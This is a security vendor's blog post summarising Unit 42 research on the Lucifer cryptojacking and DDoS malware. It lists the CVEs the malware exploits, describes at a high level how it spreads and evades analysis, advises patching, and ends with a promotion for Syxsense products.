By Blog, NewsNo Comments

Lucifer Malware Targets Windows Systems

Experts have identified a new malware called Lucifer that targets Windows systems with cryptojacking and distributed denial-of-service (DDoS) attacks.

[vc_empty_space]
[vc_single_image image=”38967″ img_size=”full”]

New Malware Exploits Critical Vulnerabilities

A new devilish malware is currently exploiting critical vulnerabilities on Windows devices.

Nicknamed Lucifer, the self-propagating malware is targeting Windows systems with cryptojacking and distributed denial-of-service (DDoS) attacks. This new variant initially attempts to infect devices by blasting them with attacks in the hopes of exploiting any number of unpatched vulnerabilities.

“Lucifer is a new hybrid of cryptojacking and DDoS malware variant that leverages old vulnerabilities to spread and perform malicious activities on Windows platforms,” stated researchers at Palo Alto Networks’ Unit 42 team. “Applying the updates and patches to the affected software are strongly advised.”

In a blog post, researchers said the latest variant of Lucifer was discovered on May 29 while investigating the exploit of CVE-2019-9081, a bug in the Laravel Framework that can be exploited to achieve remote code execution attacks. There are in fact many other vulnerabilities being exploited such as in Rejetto HTTP File Server (CVE-2014-6287), Microsoft Windows (CVE-2017-0144, CVE-2017-0145, CVE-2017-8464), Apache Struts (CVE-2017-9791), Oracle Weblogic (CVE-2017-10271), ThinkPHP RCE (CVE-2018-20062), and Laravel framework (CVE-2019-9081), among others.

How Lucifer Malware Infects Targets

After successfully exploiting the vulnerability through the use of credential-stuffing, the attacker then connects to the command-and-control (C2) server to execute arbitrary commands on the vulnerable device. These include TCP, UDP, or HTTP denial-of-service attacks. The malware may also infect its targets through IPC, WMI, SMB, and FTP via brute-force as well as through MSSQL, RPC, and network sharing.

“The targets are Windows hosts on both internet and intranet, given that the attacker is leveraging certutil utility in the payload for malware propagation,” the researchers noted. If the SMB protocol is left open, Lucifer then executes several backdoors to establish persistence. These include EternalBlue, EternalRomance, and DoublePulsar exploits. Researchers say Lucifer can also attempt to evade detection or reverse engineering with anti-sandbox capability and enhanced checks for device drivers, DLLs, and virtual devices.

Researchers discovered two versions of the malware: one initiated on May 29 and the other that “wreaked havoc” on June 11. The developer of the malware refers to it as Satan DDoS, but since other malware families already use this name, the researchers at Palo Alto decided “Lucifer” was more fitting.

How to Detect and Avoid Malware

Although malware appears to be growing in sophistication, researchers recommend enterprises protecting themselves with simple security measures such as applying the necessary security updates and strengthening authentication methods.

Syxsense Manage and Syxsense Secure can easily resolve vulnerabilities across an entire environment, whether on-premise or remote. A combination of strict security standards and proper offline backups, paired with a secure systems management and security solution, will ensure that organizations are not affected by rising ransomware and other malware events.

[vc_separator]

Experience the Power of Syxsense

Syxsense has created innovative and intuitive technology that sees and knows everything. Manage and secure your environment with a simple and powerful solution.

[vc_btn title=”Start a Free Trial” style=”gradient-custom” gradient_custom_color_1=”#da4453″ gradient_custom_color_2=”#8a2387″ shape=”round” size=”lg” align=”center” link=”url:https%3A%2F%2Fwww.syxsense.com%2Fstart-a-free-trial-of-syxsense%2F|||” css=”.vc_custom_1590698033746{margin-top: 15px !important;}”][vc_separator css=”.vc_custom_1552427883977{padding-top: 20px !important;padding-bottom: 20px !important;}”]